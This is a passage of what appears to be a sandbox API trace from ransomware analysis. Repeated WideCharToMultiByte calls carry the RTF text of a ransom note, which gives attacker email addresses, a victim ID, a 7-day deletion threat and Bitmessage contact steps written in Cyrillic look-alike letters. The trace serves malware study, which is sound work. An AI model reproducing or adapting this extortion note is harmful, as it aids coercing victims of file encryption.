software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.513] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.513] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 